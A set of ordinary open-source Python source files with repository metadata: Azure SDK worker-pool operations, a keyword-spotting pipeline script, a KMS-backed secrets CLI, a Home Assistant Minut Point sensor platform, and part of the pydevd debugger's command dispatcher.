content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
_json = self._serialize.body(worker_pool_envelope, 'WorkerPoolResource')
request = build_update_worker_pool_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.update_worker_pool.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_worker_pool.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}"} # type: ignore
@distributed_trace
def list_worker_pool_instance_metric_definitions(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
instance: str,
**kwargs: Any
) -> Iterable[_models.ResourceMetricDefinitionCollection]:
"""Get metric definitions for a specific instance of a worker pool of an App Service Environment.
Get metric definitions for a specific instance of a worker pool of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:param instance: Name of the instance in the worker pool.
:type instance: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ResourceMetricDefinitionCollection or the result
of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.ResourceMetricDefinitionCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.ResourceMetricDefinitionCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_worker_pool_instance_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
instance=instance,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_worker_pool_instance_metric_definitions.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_worker_pool_instance_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
instance=instance,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ResourceMetricDefinitionCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_worker_pool_instance_metric_definitions.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/instances/{instance}/metricdefinitions"} # type: ignore
@distributed_trace
def list_web_worker_metric_definitions(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
**kwargs: Any
) -> Iterable[_models.ResourceMetricDefinitionCollection]:
"""Get metric definitions for a worker pool of an App Service Environment.
Get metric definitions for a worker pool of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ResourceMetricDefinitionCollection or the result
of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.ResourceMetricDefinitionCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.ResourceMetricDefinitionCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_web_worker_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_web_worker_metric_definitions.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_web_worker_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ResourceMetricDefinitionCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_web_worker_metric_definitions.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/metricdefinitions"} # type: ignore
@distributed_trace
def list_worker_pool_skus(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
**kwargs: Any
) -> Iterable[_models.SkuInfoCollection]:
"""Get available SKUs for scaling a worker pool.
Get available SKUs for scaling a worker pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SkuInfoCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.SkuInfoCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.SkuInfoCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_worker_pool_skus_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_worker_pool_skus.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_worker_pool_skus_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("SkuInfoCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_worker_pool_skus.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/skus"} # type: ignore
@distributed_trace
def list_web_worker_usages(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
**kwargs: Any
) -> Iterable[_models.UsageCollection]:
"""Get usage metrics for a worker pool of an App Service Environment.
Get usage metrics for a worker pool of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either UsageCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.UsageCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.UsageCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_web_worker_usages_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_web_worker_usages.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_web_worker_usages_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("UsageCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_web_worker_usages.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/usages"} # type: ignore
| {
"content_hash": "d02a162098329796829b34f29ca5e8a9",
"timestamp": "",
"source": "github",
"line_count": 5108,
"max_line_length": 272,
"avg_line_length": 42.743931088488644,
"alnum_prop": 0.6155558405393522,
"repo_name": "Azure/azure-sdk-for-python",
"id": "09fd2862d36580800acb46403729037ad4ba2c78",
"size": "218836",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2019_08_01/operations/_app_service_environments_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import numpy as np
from search.kws import KWS
from ip import doc_processor
from search import plot_accuracy
# Process the images and generate a feature map
doc_processor.main()
# process the logs, do some plots and stdout
plot_accuracy.main()
# Load training and validation data
kws = KWS()
kws.load_train_and_valid()
# Get one single page from the validation data
index = np.array([['300'].count(x.doc_id) > 0 for x in kws.valid.coords], dtype=bool)
dataset = kws.valid.subset(index)
# Search
kws.set_data(dataset)
kws.create_index()
kws.search_word('with')
| {
"content_hash": "18ba152b51b07fa96e486577215208b7",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 85,
"avg_line_length": 22.64,
"alnum_prop": 0.7438162544169611,
"repo_name": "dwettstein/pattern-recognition-2016",
"id": "b1d986433fafacc67d2388aa31216cf9ec09b16f",
"size": "566",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kws_pipeline.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5448"
},
{
"name": "CSS",
"bytes": "1253"
},
{
"name": "JavaScript",
"bytes": "5235"
},
{
"name": "Python",
"bytes": "602347"
},
{
"name": "Ruby",
"bytes": "820"
}
],
"symlink_target": ""
} |
import argparse
import kaurna
class CLIDispatcher:
operation_info={
'create_kaurna_key':{
'help':'Create the kaurna KMS key and key alias. This must be called before kaurna can be used. Because creating KMS keys is a non-reversible operation, this must be done manually.',
'initial':'c'
},
'list_secrets':{
'help':'List the stored secrets. If you provide --secret-name, only versions of that secret will be shown. If you provide --secret-name and --secret-version, only the one secret/version will be shown.',
'initial':'l'
},
'rotate_keys':{
'help':'Rotate the data keys used for the provided secret, or for all secrets if no secret name is provided.',
'initial':'r'
},
'store_secret':{
'help':'Store a new secret.',
'initial':'s'
},
'erase_secret':{
'help':'Erase the provided secret from kaurna. Can be used to delete all versions of a secret, but cannot be used to delete all secrets at once. For that, use --delete-all-the-things.',
'initial':'e'
},
'deprecate_secrets':{
'help':'Mark the provided secret as deprecated to prevent automated usage.',
'initial':'d'
},
'activate_secrets':{
'help':'Mark the provided secret as active to allow automated usage.',
'initial':'a'
},
'update_secrets':{
'help':'Update the list of entities allowed to access a secret, and rotate the data key.',
'initial':'u'
},
'get_secret':{
'help':'Download the desired secret. This will print it to stdout; if you don\'t want it to appear on the screen, you can pipe the output of this command to a file or to a clipboard program like pbcopy or xclip (which one to use varies based on your OS).',
'initial':'g'
},
'erase_all_the_things':{
'help':'Erase every secret. Only use this as a last resort. Even if you pass in --force, this will require a prompt.',
'initial':None
}
}
def list_secrets(self, **kwargs):
secrets = kaurna.describe_secrets(secret_name=kwargs['secret_name'], secret_version=kwargs['secret_version'], region=kwargs['region'])
for secret in secrets.keys():
print('Secret name: {0}'.format(secret))
for version in secrets[secret].keys():
print(' Version: {0}'.format(version))
print(' Authorized entities: {0}'.format(', '.join(secrets[secret][version]['authorized_entities']) if secrets[secret][version]['authorized_entities'] else '[None]'))
print(' Deprecated: {0}'.format('Yes' if secrets[secret][version]['deprecated'] else 'No'))
print(' Created: {0}'.format(secrets[secret][version]['create_date']))
print(' Last data key rotation: {0}'.format(secrets[secret][version]['last_data_key_rotation']))
def rotate_keys(self, **kwargs):
kaurna.rotate_data_keys(**kwargs)
def store_secret(self, **kwargs):
kaurna.store_secret(**kwargs)
def create_kaurna_key(self, **kwargs):
print('About to create the kaurna KMS key.')
if kwargs['force']:
print('--force provided. Skipping prompt.')
else:
response = raw_input('Proceed? Y/N ')
if response.strip().lower() not in ['y','yes']:
print('Aborted.')
exit(1)
if kaurna.create_kaurna_key(**kwargs):
print('KMS key with alias \'kaurna\' created.')
else:
print('KMS key with alias \'kaurna\' already exists. No need to create.')
def erase_secret(self, **kwargs):
if not kwargs['secret_name']:
print('Must provide secret_name.')
exit(1)
print('About to delete the following secrets:')
secrets = kaurna.load_all_entries(attributes_to_get=['secret_name','secret_version'], **kwargs)
for secret in sorted(secrets, key=lambda s: '{0}/{1}'.format(s['secret_name'], s['secret_version'])):
print('Name: {0}, version {1}'.format(secret['secret_name'], secret['secret_version']))
if kwargs['force']:
print('--force provided. Skipping prompt.')
else:
response = raw_input('Y/N? ')
if response.strip().lower() not in ['y','yes']:
print('Aborted.')
exit(1)
kaurna.erase_secret(**kwargs)
# hasn't yet been manually tested in its latest form
def deprecate_secrets(self, **kwargs):
secrets = kaurna.load_all_entries(attributes_to_get=['secret_name','secret_version','deprecated'], **kwargs)
sorted_secrets = sorted([secret for secret in secrets if not secret['deprecated']], key=lambda s: '{0}/{1}'.format(s['secret_name'], s['secret_version']))
if sorted_secrets:
print('About to deprecate the following secrets:')
for secret in sorted_secrets:
print('Name: {0}, version {1}'.format(secret['secret_name'], secret['secret_version']))
if kwargs['force']:
print('--force provided. Skipping prompt.')
else:
response = raw_input('Y/N? ')
if response.strip().lower() not in ['y','yes']:
print('Aborted.')
exit(1)
kaurna.deprecate_secrets(**kwargs)
else:
print('No active secrets matching those parameters found.')
def activate_secrets(self, **kwargs):
kaurna.activate_secrets(**kwargs)
def update_secrets(self, **kwargs):
kaurna.update_secrets(**kwargs)
def get_secret(self, **kwargs):
print(kaurna.get_secret(**kwargs))
def erase_all_the_things(self, **kwargs):
seriously=False
print('YOU ARE ABOUT TO DELETE THE KAURNA DYNAMODB TABLE. THIS WILL DELETE EVERYTHING.')
print('Are you really sure you want to do this?')
response = raw_input('Y/N? ')
if response.strip().lower() not in ['y','yes']:
print('Aborted.')
exit(1)
response2 = raw_input('Seriously? Y/N ')
if response2.strip().lower() not in ['y','yes']:
print('Aborted.')
exit(1)
else:
seriously=True
kaurna.erase_all_the_things(seriously=seriously, **kwargs)
exit(1)
def get_argument_parser(self):
parser = argparse.ArgumentParser(description='Interact with kaurna from the command line.')
operations = parser.add_mutually_exclusive_group(required=True)
for operation in self.operation_info.keys():
op = self.operation_info[operation]
operation_cli = '--{0}'.format(operation.replace('_','-'))
if op['initial']:
operations.add_argument('-{0}'.format(op['initial']), operation_cli, action='store_true', help='Operation: {0}'.format(op['help']))
else:
operations.add_argument(operation_cli, action='store_true', help='Operation: {0}'.format(op['help']))
parser.add_argument('--region', default='us-east-1', help='Argument: The AWS region to use.')
parser.add_argument('--secret-name', default=None, help='Argument: The name of the secret. Required for erase-secret, store-secret, and get-secret. Optional for list-secrets, rotate-keys, deprecate-secrets, activate-secrets, and update-secrets.')
parser.add_argument('--secret-version', default=None, help='Argument: The version of the secret to use. If this is provided, secret-name must also be provided. Optional for list-secrets, rotate-keys, store-secret, erase-secrets, deprecate-secrets, activate-secrets, update-secrets, and get-secret.')
parser.add_argument('--secret', default=None, help='Argument: The secret to store. Currently the only way to enter it is here, but I\'ll add a way to enter it that doesn\'t display it later. Required for store-secret.')
parser.add_argument('--authorized-entities', nargs='+', help='Argument: The entities that should have permission to access the secret(s). Optional for update-secrets and store-secret; if not provided the empty list will be used.')
parser.add_argument('-f', '--force', action='store_true', help='Argument: Skip normal confirmation prompts. Optional for all calls. Ignored by erase-all-the-things.')
parser.add_argument('-v', '--verbose', action='store_true', help='Argument: Print random usually-useless information. May or may not print anything depending on whether or not I\'ve implemented it yet, as I haven\'t right now. Optional for all calls.')
return parser
def handle_args(self, args):
operation = None
argdict = {}
for pair in args._get_kwargs():
if pair[0] in self.operation_info.keys():
operation = operation if not pair[1] else pair[0]
else:
argdict[pair[0]] = pair[1]
try:
getattr(self, operation)(**argdict)
except Exception as e:
print(e.message)
exit(1)
def do_stuff(self):
parser = self.get_argument_parser()
args = parser.parse_args()
self.handle_args(args)
| {
"content_hash": "24ebb40bbd1580dc4f9365d18020778f",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 309,
"avg_line_length": 52.574585635359114,
"alnum_prop": 0.5916351408154686,
"repo_name": "edofleini/kaurna",
"id": "7b287be3ba8387f60fb73a502a5a69fcb0ef730f",
"size": "9539",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kaurna/cli.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "67606"
}
],
"symlink_target": ""
} |
"""Support for Minut Point sensors."""
import logging
from homeassistant.components.sensor import DOMAIN
from homeassistant.const import (
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_PRESSURE,
DEVICE_CLASS_TEMPERATURE,
TEMP_CELSIUS,
UNIT_PERCENTAGE,
)
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.util.dt import parse_datetime
from . import MinutPointEntity
from .const import DOMAIN as POINT_DOMAIN, POINT_DISCOVERY_NEW
_LOGGER = logging.getLogger(__name__)
DEVICE_CLASS_SOUND = "sound_level"
SENSOR_TYPES = {
DEVICE_CLASS_TEMPERATURE: (None, 1, TEMP_CELSIUS),
DEVICE_CLASS_PRESSURE: (None, 0, "hPa"),
DEVICE_CLASS_HUMIDITY: (None, 1, UNIT_PERCENTAGE),
DEVICE_CLASS_SOUND: ("mdi:ear-hearing", 1, "dBa"),
}
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up a Point's sensors based on a config entry."""
async def async_discover_sensor(device_id):
"""Discover and add a discovered sensor."""
client = hass.data[POINT_DOMAIN][config_entry.entry_id]
async_add_entities(
(
MinutPointSensor(client, device_id, sensor_type)
for sensor_type in SENSOR_TYPES
),
True,
)
async_dispatcher_connect(
hass, POINT_DISCOVERY_NEW.format(DOMAIN, POINT_DOMAIN), async_discover_sensor
)
class MinutPointSensor(MinutPointEntity):
"""The platform class required by Home Assistant."""
def __init__(self, point_client, device_id, device_class):
"""Initialize the sensor."""
super().__init__(point_client, device_id, device_class)
self._device_prop = SENSOR_TYPES[device_class]
async def _update_callback(self):
"""Update the value of the sensor."""
if self.is_updated:
_LOGGER.debug("Update sensor value for %s", self)
self._value = await self.hass.async_add_executor_job(
self.device.sensor, self.device_class
)
self._updated = parse_datetime(self.device.last_update)
self.async_write_ha_state()
@property
def icon(self):
"""Return the icon representation."""
return self._device_prop[0]
@property
def state(self):
"""Return the state of the sensor."""
if self.value is None:
return None
return round(self.value, self._device_prop[1])
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return self._device_prop[2]
| {
"content_hash": "005fd9133b51be4d3ac79e17334de291",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 85,
"avg_line_length": 31.463414634146343,
"alnum_prop": 0.6406976744186047,
"repo_name": "pschmitt/home-assistant",
"id": "70fe1ef0b6dc27d781641ed20b26df30efb94711",
"size": "2580",
"binary": false,
"copies": "5",
"ref": "refs/heads/dev",
"path": "homeassistant/components/point/sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1522"
},
{
"name": "Python",
"bytes": "24807200"
},
{
"name": "Shell",
"bytes": "4342"
}
],
"symlink_target": ""
} |
import os
import sys
import traceback
from _pydev_bundle import pydev_log
from _pydevd_bundle import pydevd_traceproperty, pydevd_dont_trace, pydevd_utils
import pydevd_tracing
import pydevd_file_utils
from _pydevd_bundle.pydevd_breakpoints import LineBreakpoint, get_exception_class
from _pydevd_bundle.pydevd_comm import (CMD_RUN, CMD_VERSION, CMD_LIST_THREADS, CMD_THREAD_KILL,
CMD_THREAD_SUSPEND, pydevd_find_thread_by_id, CMD_THREAD_RUN, InternalRunThread, CMD_STEP_INTO, CMD_STEP_OVER,
CMD_STEP_RETURN, CMD_STEP_INTO_MY_CODE, InternalStepThread, CMD_RUN_TO_LINE, CMD_SET_NEXT_STATEMENT,
CMD_SMART_STEP_INTO, InternalSetNextStatementThread, CMD_RELOAD_CODE, ReloadCodeCommand, CMD_CHANGE_VARIABLE,
InternalChangeVariable, CMD_GET_VARIABLE, InternalGetVariable, CMD_GET_ARRAY, InternalGetArray, CMD_GET_COMPLETIONS,
InternalGetCompletions, CMD_GET_FRAME, InternalGetFrame, CMD_SET_BREAK, file_system_encoding, CMD_REMOVE_BREAK,
CMD_EVALUATE_EXPRESSION, CMD_EXEC_EXPRESSION, InternalEvaluateExpression, CMD_CONSOLE_EXEC, InternalConsoleExec,
CMD_SET_PY_EXCEPTION, CMD_GET_FILE_CONTENTS, CMD_SET_PROPERTY_TRACE, CMD_ADD_EXCEPTION_BREAK,
CMD_REMOVE_EXCEPTION_BREAK, CMD_LOAD_SOURCE, CMD_ADD_DJANGO_EXCEPTION_BREAK, CMD_REMOVE_DJANGO_EXCEPTION_BREAK,
CMD_EVALUATE_CONSOLE_EXPRESSION, InternalEvaluateConsoleExpression, InternalConsoleGetCompletions,
CMD_RUN_CUSTOM_OPERATION, InternalRunCustomOperation, CMD_IGNORE_THROWN_EXCEPTION_AT, CMD_ENABLE_DONT_TRACE,
CMD_SHOW_RETURN_VALUES, CMD_SET_UNIT_TEST_DEBUGGING_MODE, ID_TO_MEANING, CMD_GET_DESCRIPTION, InternalGetDescription,
InternalLoadFullValue, CMD_LOAD_FULL_VALUE, CMD_PROCESS_CREATED_MSG_RECEIVED, CMD_REDIRECT_OUTPUT, CMD_GET_NEXT_STATEMENT_TARGETS,
InternalGetNextStatementTargets, CMD_SET_PROJECT_ROOTS, CMD_GET_SMART_STEP_INTO_VARIANTS,
CMD_GET_THREAD_STACK, CMD_THREAD_DUMP_TO_STDERR, CMD_STOP_ON_START, CMD_GET_EXCEPTION_DETAILS, NetCommand,
CMD_SET_PROTOCOL, CMD_PYDEVD_JSON_CONFIG, InternalGetThreadStack, InternalSmartStepInto, InternalGetSmartStepIntoVariants,
CMD_DATAVIEWER_ACTION, InternalDataViewerAction, CMD_TABLE_EXEC, InternalTableCommand, CMD_INTERRUPT_DEBUG_CONSOLE, CMD_SET_USER_TYPE_RENDERERS)
from _pydevd_bundle.pydevd_constants import (get_thread_id, IS_PY3K, DebugInfoHolder, dict_keys, STATE_RUN,
NEXT_VALUE_SEPARATOR, IS_WINDOWS, get_current_thread_id)
from _pydevd_bundle.pydevd_additional_thread_info import set_additional_thread_info
from _pydev_imps._pydev_saved_modules import threading
import json
from _pydevd_bundle.pydevd_user_type_renderers import parse_set_type_renderers_message
def process_net_command(py_db, cmd_id, seq, text):
'''Processes a command received from the Java side
@param cmd_id: the id of the command
@param seq: the sequence of the command
@param text: the text received in the command
@note: this method is run as a big switch... after doing some tests, it's not clear whether changing it for
a dict id --> function call will have better performance result. A simple test with xrange(10000000) showed
that the gains from having a fast access to what should be executed are lost because of the function call in
a way that if we had 10 elements in the switch the if..elif are better -- but growing the number of choices
makes the solution with the dispatch look better -- so, if this gets more than 20-25 choices at some time,
it may be worth refactoring it (actually, reordering the ifs so that the ones used mostly come before
probably will give better performance).
'''
# print(ID_TO_MEANING[str(cmd_id)], repr(text))
if cmd_id == CMD_INTERRUPT_DEBUG_CONSOLE:
# Must be executed outside of lock and in the non-main thread
from _pydevd_bundle.pydevd_console_integration import interrupt_debug_console
interrupt_debug_console()
return
py_db._main_lock.acquire()
try:
try:
cmd = None
if cmd_id == CMD_RUN:
py_db.ready_to_run = True
elif cmd_id == CMD_SET_PROTOCOL:
expected = (NetCommand.HTTP_PROTOCOL, NetCommand.QUOTED_LINE_PROTOCOL)
text = text.strip()
assert text.strip() in expected, 'Protocol (%s) should be one of: %s' % (
text, expected)
NetCommand.protocol = text
cmd = py_db.cmd_factory.make_protocol_set_message(seq)
elif cmd_id == CMD_VERSION:
# response is version number
# ide_os should be 'WINDOWS' or 'UNIX'.
# Default based on server process (although ideally the IDE should
# provide it).
if IS_WINDOWS:
ide_os = 'WINDOWS'
else:
ide_os = 'UNIX'
# Breakpoints can be grouped by 'LINE' or by 'ID'.
breakpoints_by = 'LINE'
splitted = text.split('\t')
if len(splitted) == 1:
_local_version = splitted
elif len(splitted) == 2:
_local_version, ide_os = splitted
elif len(splitted) == 3:
_local_version, ide_os, breakpoints_by = splitted
if breakpoints_by == 'ID':
py_db._set_breakpoints_with_id = True
else:
py_db._set_breakpoints_with_id = False
pydevd_file_utils.set_ide_os(ide_os)
cmd = py_db.cmd_factory.make_version_message(seq)
elif cmd_id == CMD_LIST_THREADS:
# response is a list of threads
cmd = py_db.cmd_factory.make_list_threads_message(seq)
elif cmd_id == CMD_GET_THREAD_STACK:
# Receives a thread_id and a given timeout, which is the time we should
# wait to the provide the stack if a given thread is still not suspended.
if '\t' in text:
thread_id, timeout = text.split('\t')
timeout = float(timeout)
else:
thread_id = text
timeout = .5 # Default timeout is .5 seconds
# If it's already suspended, get it right away.
internal_get_thread_stack = InternalGetThreadStack(seq, thread_id, py_db, set_additional_thread_info, timeout=timeout)
